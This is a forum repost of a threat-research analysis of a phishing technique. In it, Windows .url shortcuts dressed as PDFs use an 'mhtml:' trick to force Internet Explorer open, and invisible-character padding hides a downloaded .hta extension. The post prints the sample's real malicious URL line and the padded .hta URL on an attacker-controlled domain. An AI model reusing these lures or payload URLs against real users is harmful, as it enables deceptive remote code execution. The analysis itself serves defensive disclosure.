- Регистрация
- 20.01.2011
- Сообщения
- 7,665
- Розыгрыши
- 0
- Реакции
- 135
Introduction and Background
Check Point Research recently discovered that threat actors have been using novel (or previously unknown) tricks to lure Windows users for remote code execution. Specifically, the attackers used special Windows Internet Shortcut files (.url extension name), which, when clicked, would call the retired Internet Explorer (IE) to visit the attacker-controlled URL. An additional trick on IE is used to hide the malicious .hta extension name. By opening the URL with IE instead of the modern and much more secure Chrome/Edge browser on Windows, the attacker gained significant advantages in exploiting the victim’s computer, although the computer is running the modern Windows 10/11 operating system.For some technical background, it’s Для просмотра ссылки Войди
The malicious .url samples we discovered could be dated back as early as Для просмотра ссылки Войди
Resurrecting Internet Explorer via the “mhtml” Trick
Let’s use the latest .url Для просмотра ссылки ВойдиThe content of the sample:
Figure 1: content of the malicious .url sample
As we can see, the .url file’s last lines of strings point to a customized icon in the Microsoft Edge application file msedge.exe. This would make it appear to point to a PDF file (but, in fact, it is not).
Importantly, as we can see, the value of the URL keyword is quite different than usual ones – usually, for common .url files, the URL parameter would look like URL=Для просмотра ссылки Войди
Код:
mhtml:http://cbmelipilla.cl/te/test1.html!x-usc:http://cbmelipilla.cl/te/test1.htmlA couple of years ago, we saw the same trick (which we call the “mhtml” trick) used in the infamous Для просмотра ссылки Войди
Figure 2: key content in the CVE-2021-40444 exploit sample
We know the “mhtml” trick was previously used in Word documents when exploiting the CVE-2021-40444 vulnerability, and now we see the same trick is used in .url file. So, what could the attackers achieve by using this? Let’s do some tests.
If we rename the sample as Books_A0UJKO.pdf.url (the name in the wild), the .url file will look like the following on the (fully patched) Windows 11 – appears as a link to a PDF file.
Figure 3: the malicious .url file appears as a link to a PDF file on Windows 11
If we act like the victim (we want to open the PDF), we double-click on the Shortcut file. Then, the victim will get this:
Figure 4: IE and a promote window dialog appear when the victim double-clicks on the .url file
See what’s strange there? The Internet Explorer is opened. In fact, with a little debugging skills, we were able to confirm that IE was indeed used to open the link http://cbmelipilla[.]cl/te/test1.html, which is specified in the .url file.
As we know, Microsoft proclaimed IE Для просмотра ссылки Войди
Disclaimer: Even though IE has been proclaimed “retired and out-of-support,” technically speaking, IE is still part of the Windows OS and is “not inherently unsafe, as IE is still serviced for security vulnerabilities, and there should be no known exploitable security vulnerabilities,” according to our communications with Microsoft.
So, by default, users should not open websites with IE unless the user specifically asks to do so and with the user’s full knowledge.
However, in this sample, with the “mhtml” trick, when the victim opens the .url shortcut (the victim thinks he/she is opening a PDF), the attacker-controlled website is being opened with IE, rather than the typical Chrome/Edge.
From there (the website being opened with IE), the attacker could do many bad things because IE is insecure and outdated. For example, if the attacker has an IE zero-day exploit – which is much easier to find compared to Chrome/Edge, the attacker could attack the victim to gain remote code execution immediately. However, in the samples we analyzed, the threat actors didn’t use any IE remote code execution exploit. Instead, they used another trick in IE – which is probably not publicly known previously – to the best of our knowledge – to trick the victim into gaining remote code execution.
Additional IE Trick – Hiding the .hta Extension Name
Let’s review the previous figure again (highlighted below). According to the promoted (IE) dialog, it appears to ask the user to open a PDF file named Books_A0UJKO.pdf.
Figure 5: a closer look at the IE dialog – showing the PDF filename only
However, is this the real case here? Do you think you’re opening a PDF?
Not really. If we click “Open” (the default option) on the above IE dialog, we will get another promoted dialog (see the following). This is because of IE’s Protected Mode (a relatively weaker browser sandbox).
Figure 6: IE Protected Mode warning dialog
If the victim continues to ignore the warning (as the victim thinks he/she is opening a PDF), the victim’s machine will eventually get hacked – the “opened” file is actually a malicious .hta file being downloaded and executed.
If we look closely at the HTTP traffic, we will find that there are many non-printable characters appending to the end of the Books_A0UJKO.pdf string. In the end, there’s the .hta string—this is the real (and dangerous) extension name.
Figure 7: the HTTP traffic showing the full URI visited
This is exactly the reason why the IE dialog didn’t show the .hta file name to the user. The real full URL is:
Код:
https://cbmelipilla.cl/te/Books_A0UJKO.pdf%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80.htaДля просмотра ссылки Войди